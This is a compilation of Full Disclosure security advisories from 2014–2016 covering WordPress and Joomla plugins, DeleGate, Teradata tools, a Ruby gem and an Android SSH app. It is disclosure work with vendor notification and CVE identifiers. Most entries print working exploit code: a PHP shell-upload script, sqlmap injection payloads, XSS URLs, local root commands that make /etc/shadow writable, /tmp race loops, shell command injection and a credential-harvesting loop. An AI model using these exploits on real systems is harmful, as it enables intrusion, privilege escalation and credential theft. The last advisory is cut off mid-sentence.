[FD] Remote file upload vulnerability in mailcwp v1.99 wordpress plugin
Title: Remote file upload vulnerability in mailcwp v1.99 wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-09
Download Site: https://wordpress.org/plugins/mailcwp/
Vendor: CadreWorks Pty Ltd
Vendor Notified: 2015-07-09 fixed in v1.110
Vendor Contact: Contact Page via WP site
Description: MailCWP, Mail Client for WordPress. A full-featured mail client
plugin providing webmail access through your WordPress blog or website.
Vulnerability:
The code in mailcwp-upload.php doesn't check that a user is authenticated or
what type of file is being uploaded any user can upload a shell to the target
wordpress server:
2 $message_id = $_REQUEST["message_id"];
3 $upload_dir = $_REQUEST["upload_dir"];
.
.
8 $fileName = $_FILES["file"]["name"];
9 move_uploaded_file($_FILES["file"]["tmp_name"],
"$upload_dir/$message_id-$fileName");
Exploitation requires the attacker to guess a writeable location in the http
server root.
CVEID:
OSVDB:
Exploit Code:
• http://www.example.com/wp-content/plugins/mailcwp/mailcwp-upload.php?message_id=1&upload_dir=/usr/share/wordpress/wp-content/uploads';
• $file_name_with_full_path = '/var/www/shell.php';
•
• echo "POST to $target_url $file_name_with_full_path";
• $post = array('file' =>
'shell.php','file'=>'@'.$file_name_with_full_path);
•
• $ch = curl_init();
• curl_setopt($ch, CURLOPT_URL,$target_url);
• curl_setopt($ch, CURLOPT_POST,1);
• curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
• curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
• $result=curl_exec ($ch);
• curl_close ($ch);
• echo "";
• echo $result;
• echo "";
• ?>
•
Advisory: http://www.vapid.dhs.org/advisory.php?v=138
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] Remote file upload vulnerability in mailcwp v1.99 wordpress plugin
> On Jul 16, 2015, at 8:18 PM, Larry W. Cashdollar wrote: > > Title: Remote file upload vulnerability in mailcwp v1.99 wordpress plugin > Author: Larry W. Cashdollar, @_larry0 > Date: 2015-07-09 > Download Site: https://wordpress.org/plugins/mailcwp/ > Vendor: CadreWorks Pty Ltd > Vendor Notified: 2015-07-09 fixed in v1.110 Typo should be v1.100. ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Local root vulnerability in DeleGate v9.9.13
Title: Local root vulnerability in DeleGate v9.9.13 Author: Larry W. Cashdollar, @_larry0 Date: 2015-12-17 Advisory: http://www.vapidlabs.com/advisory.php?v=159 Download Sites: http://delegate.hpcc.jp/delegate/ http://delegate.org/delegate/ Vendor: National Institute of Advanced Industrial Science and Technology Vendor Notified: 2015-12-17 Vendor Contact: y.s...@delegate.org ys...@etl.go.jp Description: DeleGate is a multipurpose proxy server which relays various application protocols on TCP/IP or UDP/IP, including HTTP, FTP, Telnet, NNTP, SMTP, POP, IMAP, LPR, LDAP, ICP, DNS, SSL, Socks, and more. DeleGate mediates communication between servers and clients where direct communication is impossible, inefficient, or inconvenient. Vulnerability: Installation of delegate 9.9.13 sets some binaries setuid root, at least one of these binaries can be used to escalate the privileges of a local user. The binary dgcpnod creates a node allowing a local unprivileged user to create files anywhere on disk. By creating a file in /etc/cron.hourly a local user can execute commands as root. Installation of software via source or binary distribution with option to not run as root results in a script set-subin.sh to run setting the setuid bit on four binaries. In Linux distributions where this software is part of the package list these binaries are not setuid root. (archlinux) From documentation http://www.delegate.org/delegate/newbies-ja.shtml (translated to english): Go is included in the binary distribution, or DGROOT that you can build from the source to the location of preference, and then change the name if necessary. This is the DgRoot. In addition, if needed, you can rename the executable file of DeleGate to the name of the preference. This is the DgExe. "In Unix version subin in if you want to use "(such as when using a privileged port), do the following. (3-2uk) $ cd DgRoot / subin $ Sh setup-subin.sh larry@f4ult:~/dg9_9_13/DGROOT/subin$ ls -l total 1916 -r-sr-s--- 1 root larry 384114 Oct 31 2014 dgbind -r-sr-s--- 1 root larry 384598 Oct 31 2014 dgchroot -r-sr-s--- 1 root larry 384161 Oct 31 2014 dgcpnod -rwxr-xr-x 1 larry larry 384114 Oct 31 2014 dgdate -rwxr-xr-x 1 larry larry 29066 Oct 31 2014 dgforkpty -r-sr-s--- 1 root larry 384113 Oct 31 2014 dgpam -rwxr-x--- 1 larry larry272 Oct 27 2014 setup-subin.sh This script sets the setuid bit on four binaries: larry@f4ult:~/dg9_9_13/DGROOT/subin$ cat setup-subin.sh #!/bin/sh SUBINS="dgpam dgbind dgchroot dgcpnod" sudo sh -c "chown root $SUBINS; chmod 6550 $SUBINS" if [ $? != 0 ]; then su root -c "chown root $SUBINS; chmod 6550 $SUBINS" fi CVEID: 2015-7556 Exploit Code: $ touch /tmp/rootme; chmod +x /tmp/rootme; ./dgcpnod /tmp/rootme /etc/cron.hourly/rootme; echo -e '#!/bin/bash \n chmod 777 /etc/shadow' > /etc/cron.hourly/rootme ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] XSS and SQLi in huge IT gallery v1.1.5 for Joomla
Title: XSS and SQLi in huge IT gallery v1.1.5 for Joomla
Fixed: v1.1.7
Author: Larry W. Cashdollar, @_larry0 and Elitza Neytcheva, @ElitzaNeytcheva
Date: 2016-07-14
Download Site:
http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-pro
Vendor: huge-it.com
Vendor Notified: 2016-07-15, fixed 2016-07-23
Vendor Contact: i...@huge-it.com
Description: The plugin allows you to add multiple images to the gallery,
create countless galleries, add a description to each of them, as well as make
the same things with video links.
Vulnerability:
The attacker must be logged in with at least manager level access or access to
the administrative panel to exploit this vulnerability:
SQL in code via id parameter:
./administrator/components/com_gallery/models/gallery.php
51 public function getPropertie() {
52 $db = JFactory::getDBO();
53 $id_cat = JRequest::getVar('id');
54 $query = $db->getQuery(true);
55 $query->select('#__huge_itgallery_images.name as name,'
56 . '#__huge_itgallery_images.id ,'
57 . '#__huge_itgallery_gallerys.name as portName,'
58 . 'gallery_id, #__huge_itgallery_images.description as
description,image_url,sl_url,sl_type,link_target,#__huge_itg
allery_images.ordering,#__huge_itgallery_images.published,published_in_sl_width');
59 $query->from(array('#__huge_itgallery_gallerys' =>
'#__huge_itgallery_gallerys', '#__huge_itgallery_images' => '#__huge_itg
allery_images'));
60 $query->where('#__huge_itgallery_gallerys.id =
gallery_id')->where('gallery_id=' . $id_cat);
61 $query->order('ordering desc');
62
64 $db->setQuery($query);
65 $results = $db->loadObjectList();
66 return $results;
67 }
XSS is here:
root@Joomla:/var/www/html# find . -name "*.php" -exec grep -l "echo \$_GET" {}
\;
./administrator/components/com_gallery/views/gallery/tmpl/default.php
root@Joomla:/var/www/html# find . -name "*.php" -exec grep -n "echo \$_GET" {}
\;
256:
CVE Assignments: CVE-2016-1000113 XSS, CVE-2016-1000114 SQL Injection
JSON: Export
Exploit Code:
XSS PoC
http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=1--%20%22%3E%3Cscript%3Ealert(1);%3C/script%3E
SQLi PoC
http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=SQLiHERE
$ sqlmap --load-cookies=cookies.txt -u
"http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=*";
--dbms mysql
Screen Shots:
Advisory: http://www.vapidlabs.com/advisory.php?v=164
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla
Title: Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-15
Download Site: http://huge-it.com/joomla-video-gallery/
Vendor: www.huge-it.com, fixed v1.1.0
Vendor Notified: 2016-09-17
Vendor Contact: i...@huge-it.com
Description: A video slideshow gallery.
Vulnerability:
The following code does not prevent an unauthenticated user from injecting SQL
into functions located in ajax_url.php.
Vulnerable Code in : ajax_url.php
11 define('_JEXEC',1);
12 defined('_JEXEC') or die('Restircted access');
.
.
.
28 if($_POST['task']=="load_videos_content"){
29
30 $page = 1;
31
32
33 if(!empty($_POST["page"]) && is_numeric($_POST['page']) &&
$_POST['page']>0){
34 $paramssld='';
35 $db5 = JFactory::getDBO();
36 $query5 = $db->getQuery(true);
37 $query5->select('*');
38 $query5->from('#__huge_it_videogallery_params');
39 $db->setQuery($query5);
40 $options_params = $db5->loadObjectList();
41 foreach ($options_params as $rowpar) {
42 $key = $rowpar->name;
43 $value = $rowpar->value;
44 $paramssld[$key] = $value;
45 }
46 $page = $_POST["page"];
47 $num=$_POST['perpage'];
48 $start = $page * $num - $num;
49 $idofgallery=$_POST['galleryid'];
50
51 $query = $db->getQuery(true);
52 $query->select('*');
53 $query->from('#__huge_it_videogallery_videos');
54 $query->where('videogallery_id ='.$idofgallery);
55 $query ->order('#__huge_it_videogallery_videos.ordering
asc');
56 $db->setQuery($query,$start,$num);
CVE-2016-1000123
JSON: Export
Exploit Code:
• $ sqlmap -u
'http://example.com/components/com_videogallerylite/ajax_url.php'
--data="page=1&galleryid=*&task=load_videos_content&perpage=20&linkbutton=2"
--level=5 --risk=3
• .
• .
• .
• (custom) POST parameter '#1*' is vulnerable. Do you want to keep
testing the others (if any)? [y/N]
• sqlmap identified the following injection point(s) with a total of
2870 HTTP(s) requests:
• ---
• Parameter: #1* ((custom) POST)
• Type: error-based
• Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
• Payload: page=1&galleryid=-3390 OR 1 GROUP BY
CONCAT(0x716b766271,(SELECT (CASE WHEN (2575=2575) THEN 1 ELSE 0
END)),0x7170767071,FLOOR(RAND(0)*2)) HAVING
MIN(0)#&task=load_videos_content&perpage=20&linkbutton=2
•
• Type: AND/OR time-based blind
• Title: MySQL >= 5.0.12 time-based blind - Parameter replace
• Payload: page=1&galleryid=(CASE WHEN (5952=5952) THEN SLEEP(5)
ELSE 5952 END)&task=load_videos_content&perpage=20&linkbutton=2
• ---
• [19:36:55] [INFO] the back-end DBMS is MySQL
• web server operating system: Linux Debian 8.0 (jessie)
• web application technology: Apache 2.4.10
• back-end DBMS: MySQL >= 5.0.12
• [19:36:55] [WARNING] HTTP error codes detected during run:
• 500 (Internal Server Error) - 2714 times
• [19:36:55] [INFO] fetched data logged to text files under
'/home/larry/.sqlmap/output/192.168.0.4'
•
• [*] shutting down at 19:36:55
Screen Shots:
Advisory: http://www.vapidlabs.com/advisory.php?v=169
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla
Title: Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-16
Download Site: http://huge-it.com/joomla-catalog/
Vendor: huge-it.com
Vendor Notified: 2016-09-17
Vendor Contact: i...@huge-it.com
Description:
Huge-IT Product Catalog is made for demonstration, sale, advertisements for
your products. Imagine a stand with a
variety of catalogs with a specific product category. To imagine is not
difficult, to use is even easier.
Vulnerability:
The following code does not prevent an unauthenticated user from injecting SQL
into functions via 'load_more_elements_into_catalog' located in ajax_url.php.
Vulnerable Code in : ajax_url.php
11 define('_JEXEC', 1);
12 defined('_JEXEC') or die('Restircted access');
.
.
.
308 } elseif ($_POST["post"] == "load_more_elements_into_catalog") {
309 $catalog_id = $_POST["catalog_id"];
310 $old_count = $_POST["old_count"];
311 $count_into_page = $_POST["count_into_page"];
312 $show_thumbs = $_POST["show_thumbs"];
313 $show_description = $_POST["show_description"];
314 $show_linkbutton = $_POST["show_linkbutton"];
315 $parmalink = $_POST["parmalink"];
316 $level = $_POST['level'];
.
.
.
359 $query->select('*');
360 $query->from('#__huge_it_catalog_products');
361 $query->where('catalog_id =' . $catalog_id);
362 $query->order('ordering asc');
363 $db->setQuery($query, $from, $count_into_page);
CVE-2016-1000125
Exploit Code:
• $ sqlmap -u 'http://example.com/components/com_catalog/ajax_url.php'
--data="prod_page=1&post=load_more_elements_into_catalog&catalog_id=*&old_count=*&count_into_page=*&show_thumbs=*&show_description=*&parmalink=*"
--level=5 --risk=3
•
• Parameter: #1* ((custom) POST)
• Type: error-based
• Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
• Payload:
prod_page=1&post=load_more_elements_into_catalog&catalog_id=-2369 OR 1 GROUP BY
CONCAT(0x717a627871,(SELECT (CASE WHEN (1973=1973) THEN 1 ELSE 0
END)),0x716b787671,FLOOR(RAND(0)*2)) HAVING
MIN(0)#&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
•
• Type: AND/OR time-based blind
• Title: MySQL >= 5.0.12 time-based blind - Parameter replace
• Payload:
prod_page=1&post=load_more_elements_into_catalog&catalog_id=(CASE WHEN
(7371=7371) THEN SLEEP(5) ELSE 7371
END)&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
•
• Type: UNION query
• Title: Generic UNION query (random number) - 15 columns
• Payload:
prod_page=1&post=load_more_elements_into_catalog&catalog_id=-5943 UNION ALL
SELECT
2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,CONCAT(0x717a627871,0x494a475477424c724f6f7853556d61597544576f4b614d6e41596771595253476c4251797a685974,0x716b787671)--
FvOy&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
• ---
• [16:48:10] [INFO] the back-end DBMS is MySQL
• web server operating system: Linux Debian 8.0 (jessie)
• web application technology: Apache 2.4.10
• back-end DBMS: MySQL >= 5.0.12
• [16:48:10] [WARNING] HTTP error codes detected during run:
• 500 (Internal Server Error) - 6637 times
• [16:48:10] [INFO] fetched data logged to text files under
'/home/larry/.sqlmap/output/example.com'
•
• [*] shutting down at 16:48:10
•
Advisory: http://www.vapidlabs.com/advisory.php?v=171
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Plugin v1.0.6
Title: Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Plugin v1.0.6
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-16
Download Site: http://huge-it.com/joomla-portfolio-gallery/
Vendor: huge-it.com
Vendor Notified: 2016-09-17
Vendor Contact: i...@huge-it.com
Description: Huge-IT Portfolio Gallery extension can do wonders with your
website. If you wish to show your photos, videos, enclosing the additional
images and videos, then this Portfolio Gallery extension is what you need.
Vulnerability:
The following lines allow unauthenticated users to perform SQL injection
against the functions in ajax_url.php:
In file ajax_url.php:
11 define('_JEXEC',1);
12 defined('_JEXEC') or die('Restircted access');
.
.
.
49 $page = $_POST["page"];
50 $num=$_POST['perpage'];
51 $start = $page * $num - $num;
52 $idofgallery=$_POST['galleryid'];
53 $level = $_POST['level'];
54 $query = $db->getQuery(true);
55 $query->select('*');
56 $query->from('#__huge_itportfolio_images');
57 $query->where('portfolio_id ='.$idofgallery);
58 $query ->order('#__huge_itportfolio_images.ordering asc');
59 $db->setQuery($query,$start,$num);
CVE-2016-1000124
Exploit Code:
• $ sqlmap -u
'http://example.com/components/com_portfoliogallery/ajax_url.php'
--data="page=1&galleryid=*&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2"
--level=5 --risk=3
•
•
• (custom) POST parameter '#1*' is vulnerable. Do you want to keep
testing the others (if any)? [y/N]
• sqlmap identified the following injection point(s) with a total of
2870 HTTP(s) requests:
• ---
• Parameter: #1* ((custom) POST)
• Type: error-based
• Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
• Payload: page=1&galleryid=-2264 OR 1 GROUP BY
CONCAT(0x71716a7a71,(SELECT (CASE WHEN (3883=3883) THEN 1 ELSE 0
END)),0x7178627071,FLOOR(RAND(0)*2)) HAVING
MIN(0)#&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2
•
• Type: AND/OR time-based blind
• Title: MySQL >= 5.0.12 time-based blind - Parameter replace
• Payload: page=1&galleryid=(CASE WHEN (9445=9445) THEN SLEEP(5)
ELSE 9445 END)&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2
• ---
• [13:30:39] [INFO] the back-end DBMS is MySQL
• web server operating system: Linux Debian 8.0 (jessie)
• web application technology: Apache 2.4.10
• back-end DBMS: MySQL >= 5.0.12
• [13:30:39] [WARNING] HTTP error codes detected during run:
• 500 (Internal Server Error) - 2715 times
• [13:30:39] [INFO] fetched data logged to text files under
'/home/larry/.sqlmap/output/192.168.0.4'
•
• [*] shutting down at 13:30:39
Advisory: http://www.vapidlabs.com/advisory.php?v=170
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Teradata Virtual Machine Community Edition v15.10 has insecure file permission
Title: Teradata Virtual Machine Community Edition v15.10 has insecure file permission Author: Larry W. Cashdollar, @_larry0 Date: 2016-10-01 Download Site: http://downloads.teradata.com/download/database/teradata-virtual-machine-community-edition-for-vmware <http://downloads.teradata.com/download/database/teradata-virtual-machine-community-edition-for-vmware> Vendor: Teradata Vendor Notified: 2016-10-01 Vendor Contact: webform contact Description: A database appliance for virtual machine environments. Vulnerability: Teradata Virtual Machine Community Edition v15.10 has insecure file permissions on /etc/luminex/pkgmgr. These could allow a local user to modify its contents and execute commands as root. TVME:/ # ls -ld /etc/luminex/ drwxrwxrwx 2 root root 4096 Mar 3 2016 /etc/luminex/ TVME:/# ls -l /etc/luminex/ total 128 -rwxrwxrwx 1 root root 24576 Mar 3 2016 packages.db -rwxrwxrwx 1 root root 102357 Mar 3 2016 pkgmgr CVE: CVE-2016-7488 Exploit Code: • $ echo "#/bin/bash" > /etc/luminex/pkgmgr • $ echo "chmod 666 /etc/shadow" >> /etc/luminex/pkgmgr • $ chmod 755 /etc/luminex/pkgmgr Advisory: http://www.vapidlabs.com/advisory.php?v=172 <http://www.vapidlabs.com/advisory.php?v=172> ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Teradata Virtual Machine Community Edition v15.10 Insecure creation of files in /tmp
Title: Teradata Virtual Machine Community Edition v15.10 Insecure creation of files in /tmp Author: Larry W. Cashdollar, @_larry0 Date: 2016-10-01 Download Site: http://downloads.teradata.com/download/database/teradata-virtual-machine-community-edition-for-vmware Vendor: Teradata Vendor Notified: 2016-10-01 Vendor Contact: web form contact Description: Teradata is a relational database, they provide a Virtual Machine image for developers and community use. Vulnerability: Teradata Virtual Machine Community Edition v15.10 Insecure creation of files in /tmp may lead to elevated code execution. In /opt/teradata/gsctools/bin/t2a.pl 320 `chmod +x /tmp/$PROG.get_profile.scr ; /tmp/$PROG.get_profile.scr >/dev/null 2>&1` ; If a regular user controls /tmp/t2a.pl.get_profile.scr before the person executing this script creates it they can inject commands to be executed as that user. for example: $ while(true) do echo "chmod 666 /etc/shadow" > /tmp/t2a.pl.get_profile.scr; done If root or any other account runs that .pl script I see these files being created in /tmp [C] -rw-r- 1 root root 14 Mon Oct 3 13:03:59 2016 /tmp/t2a.vprocmanager.cmd [U] -rw-r- 1 root root 14 Mon Oct 3 13:03:59 2016 /tmp/t2a.vprocmanager.cmd [C] -rw-r- 1 root root 0 Mon Oct 3 13:03:59 2016 /tmp/t2a.vprocmanager [C] -rw-r- 1 root root 0 Mon Oct 3 13:03:59 2016 /tmp/t2a.vprocmanager.stderr [U] -rw-r- 1 root root 44 Mon Oct 3 13:03:59 2016 /tmp/t2a.vprocmanager.stderr [U] -rw-r- 1 root root 152 Mon Oct 3 13:03:59 2016 /tmp/t2a.vprocmanager.stderr [C] -rw-r- 1 root root 5 Mon Oct 3 13:03:59 2016 /tmp/t2a.get_profile.scr [U] -rw-r- 1 root root 5 Mon Oct 3 13:03:59 2016 /tmp/t2a.get_profile.scr [M] -rwxr-x--- 1 root root 5 Mon Oct 3 13:03:59 2016 /tmp/t2a.get_profile.scr CVE-ID: CVE-2016-7489 Exploit Code: • $ while(true) do echo "chmod 666 /etc/shadow" > /tmp/t2a.pl.get_profile.scr; done Advisory: www.vapidlabs.com/advisory.php?v=173 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] /tmp race condition in Teradata Studio Express v15.12.00.00 studioexpressinstall
Title: /tmp race condition in Teradata Studio Express v15.12.00.00 studioexpressinstall Author: Larry W. Cashdollar, @_larry0 Date: 2016-10-03 Download Site: http://downloads.teradata.com/download/tools/teradata-studio-express Vendor: Teradata Vendor Notified: 2016-10-03 Vendor Contact: web form contact Description: Teradata Studio Express provides an information discovery tool that retrieves data from Teradata Database systems and allows the data to be manipulated and stored on the desktop. It is built on the Eclipse Rich Client Platform (RCP). Vulnerability: The installation script for TeradataStudioExpress.15.12.00.00 creates files in /tmp insecurely. A malicious local user could create a symlink in /tmp and possibly clobber system files or perhaps elevate privileges. $ grep -n "/tmp" studioexpressinstall 33:ASKDIRFILE=/tmp/sqlajeaskdir 41:DEF_TRACEFILE=/tmp/studioexinstall.log 44:TMP=/tmp 72:SQLAJEINPUTS=/tmp/studioexinputs 90:RPM_OUT_FILE=/tmp/studioexinstall_rpmcmd.out 103:SQLAJEINSTALL=/tmp/studioexpressinstall 136: java -version > "/tmp/javaver" 2>&1 137: verstring=`grep "java version" /tmp/javaver` 143: jre64b=`grep "64-Bit" /tmp/javaver` 212:rm -f /tmp/javaver 341: tmptracefile=/tmp/studioexinstall.log.tmp#Temporary trace file. 588:touch /tmp/checkstudioexinstall 603:rm -f /tmp/checkstudioexinstall 604:rm -f /tmp/studioexinstall_rpmcmd.out CVE-ID: CVE-2016-7490 Export: JSON TEXT XML Exploit Code: • $ ln -s /tmp/javaver /etc/passed Advisory: http://www.vapidlabs.com/advisory.php?v=174 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] Stored Cross-Site Scripting in WP Canvas - Shortcodes WordPress Plugin
Hello All, These are really great advisories, my only wish is that they were copied to the security lists in their entirety. This way we aren't relying on a single point of failure (your website) when looking for the data in the future. Thanks! Larry > On Nov 19, 2016, at 5:48 AM, Summer of Pwnage wrote: > > > Stored Cross-Site Scripting in WP Canvas - Shortcodes WordPress Plugin > > Yorick Koster, July 2016 > > > Abstract > > A Cross-Site Scripting vulnerability was found in the WP Canvas - > Shortcodes WordPress Plugin. This issue allows an attacker to perform a > wide variety of actions, such as stealing Administrators' session > tokens, or performing arbitrary actions on their behalf. This issue can > be exploited by authenticated users with the Contributor or higher role. > > > OVE ID > > OVE-20160724-0031 > > > Tested versions > > This issue was successfully tested on WP Canvas - Shortcodes WordPress > Plugin version 1.92. > > > Fix > > This issue has been addressed in WP Canvas - Shortcodes WordPress Plugin > version 2.07. > > > Details > > https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_in_wp_canvas___shortcodes_wordpress_plugin.html > > > Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its > goal is to contribute to the security of popular, widely used OSS > projects in a fun and educational way. > > ___ > Sent through the Full Disclosure mailing list > https://nmap.org/mailman/listinfo/fulldisclosure > Web Archives & RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Remote Command Injection in Ruby Gem sfpagent 0.4.14
Title: Remote Command Injection in Ruby Gem sfpagent 0.4.14
Date: 4/15/2014
Author: Larry W. Cashdollar, @_larry0
CVE: 2014-2888
Download: http://rubygems.org/gems/sfpagent
Vulnerability
The list variable generated from the user supplied JSON[body] input is passed
directly to the system() shell on line 649. If a user supplies a module name
with shell metacharacters like ; they might be able to execute shell commands
on the remote system as the sfpagent running user id.
637 code, body = get_data(address, port, '/modules')
638 raise Exception, "Unable to get modules list from
{name}" if code.to_i != 200
639
640 modules = JSON[body]
641 list = ''
642 schemata.each { |m|
643 list += "{m} " if
File.exist?("{modules_dir}/{m}") and
644(not modules.has_key?(m)
or modules[m] != get_local_module_hash(m, modules_dir).to_s)
645 }
646
647 return true if list == ''
648
649 if system("cd #{modules_dir}; #{install_module}
#{address} #{port} #{list} 1>/dev/null 2>/tmp/install_module.error")
650 Sfp::Agent.logger.info "Push modules
#{list}to #{name} [OK]"
651 else
652 Sfp::Agent.logger.warn "Push modules
#{list}to #{name} [Failed]"
653 end
654
655 return true
Vendor: Notified 4/15/14. Version 0.4.15 fixes this issue.
Advisory: http://www.vapid.dhs.org/advisories/spfagent-remotecmd.html
___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Rooted SSH/SFTP Daemon Default Login Credentials
I stumbled on to this while setting up an android vulnerability testing lab. Title: Rooted SSH/SFTP Daemon Default Login Credentials Author: Larry W. Cashdollar, @_larry0 OSVDB-ID: 110742 Date: 9/2/2014 Download: https://play.google.com/store/apps/details?id=web.oss.sshsftpDaemon Description: "This app is a SSH terminal server AND an SFTP file server." Vulnerability: The software comes pre-configured with a default login of User: root Password: abc123. This weak password would easily be guessed leading to root compromise of the android system. Recommended Fix: Request the user set the password upon installation. Vendor: open.software.solutions[4t]gmail.com, Notified 9/3/2014 Greets to 44CON. ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Vulnerabilities in WordPress Database Manager v2.7.1
Title: Vulnerabilities in WordPress Database Manager v2.7.1
Author: Larry W. Cashdollar, @_larry0
Date: 10/13/2014
Download: https://wordpress.org/plugins/wp-dbmanager/
Downloads: 1,171,358
Vendor: Lester Chan, https://profiles.wordpress.org/gamerz/
Contacted: 10/13/2014, Vulnerabilities addressed in v2.7.2.
Full Advisory:
http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-dbmanager-2.7.1/index.html
CVE: 2014-8334,2014-8335
OSVDBID: 113508,113507,113509
Description: "Allows you to optimize database, repair database, backup
database, restore database, delete backup database , drop/empty tables and run
selected queries. Supports automatic scheduling of backing up, optimizing and
repairing of database."
Vulnerability: Plugin suffers from command injection, exposes MySQL database
credentials to the process table and allows the user to download system files
via the ‘Run SQL Query’ feature. User authentication with
current_user_can('manage_database')) privileges are required. The full
advisory has screen shots for illustration.
PoC
Command Injection
The command that is sent through passthru() is the following:
/usr/bin/mysqldump --force --host="localhost" --user="root"
--password="passwordhere"
--default-character-set="utf8" --add-drop-table --skip-lock-tables wordpress >
/usr/share/wordpress/wp-content/backup-db\';rce;\'/1413225588_-_wordpress.sql
rce is just a homebrew .c binary I wrote for testing command injections it
creates a file
in /tmp with some stats on who executed it.
# cat /tmp/RCE_JChl9c
ARGGHHH I've been executed! my pid is :16169 Parent id 16168
Name:sh
State:S (sleeping)
Tgid:16168
Pid:16168
PPid:15925
TracerPid:0
Uid:33333333
Gid:33333333
FDSize:32
Groups:33
In the following lines commands can be injected into the variables being used
to build
the command by using ;command;
$backup['filepath']
$backup['mysqldumppath']
I use $backup[‘filepath’] or “Path To Backup:” for my PoC.
/usr/share/wordpress/wp-content/backup-db;rce;
Saving and then Running a backup executes /usr/bin/rce, the command that is
sent through passthru() is the following:
/usr/bin/mysqldump --force --host="localhost" --user="root"
--password="passwordhere"
--default-character-set="utf8" --add-drop-table --skip-lock-tables wordpress >
/usr/share/wordpress/wp-content/backup-db;rce;/1413225588_-_wordpress.sql
rce is just a homebrew .c binary I wrote for testing command injections, it
creates a file
in /tmp with some stats on who executed it.
# cat /tmp/RCE_JChl9c
ARGGHHH I've been executed! my pid is :16169 Parent id 16168
Name:sh
State:S (sleeping)
Tgid:16168
Pid:16168
PPid:15925
TracerPid:0
Uid:33333333
Gid:33333333
FDSize:32
Groups:33
Mysql Credentials Leaked to Process Table
Also by running a simple script:
PoC:
$ while (true); do echo -n `ps ax | grep m[y]sqldump`; done
6324 ? S 0:00 sh -c /usr/bin/mysqldump --force --host="localhost" --user="root"
--password="passwordhere" --default-character-set="utf8" --add-drop-table
--skip-lock-tables wordpress >
/usr/share/wordpress/wp-content/backup-db/1413224776_-_wordpress.sql 6328 ? R
0:00 sh -c /usr/bin/mysqldump --force --host="localhost" --user="root"
--password="passwordhere" --default-character-set="utf8" --add-drop-table
--skip-lock-tables wordpress >
/usr/share/wordpress/wp-content/backup-db/1413224776_-_wordpress.sql6324 ? S
0:00 sh -c /usr/bin/mysqldump --force --host="localhost" --user="root"
--password="passwordhere" --default-character-set="utf8" --add-drop-table
--skip-lock-tables wordpress >
/usr/share/wordpress/wp-content/backup-db/1413224776_-_wordpress.sql 6328 ? S
0:00 /usr/bin/mysqldump --force --host=localhost --user=root --password=x
xx --default-character-set=utf8 --add-drop-table --skip-lock-tables
wordpress6324 ? S 0:00 sh -c /usr/bin/mysqldump --force --host="localhost"
--user="root" --password="passwordhere" --default-character-set="utf8"
--add-drop-table --skip-lock-tables wordpress >
/usr/share/wordpress/wp-content/backup-db/1413224776_-_wordpress.sql 6328 ? S
0:00 /usr/bin/mysqldump --force --host=localhost --user=root --password=x
xx --default-character-set=utf8 --add-drop-table --skip-lock-tables
wordpress
A malicious local user can harvest credentials for the mysql database off the
process table.
The trouble is the code doesn’t properly sanitize user input and
[FD] XCloner Wordpress/Joomla! backup Plugin v3.1.1 (Wordpress) v3.5.1 (Joomla!) Vulnerabilities
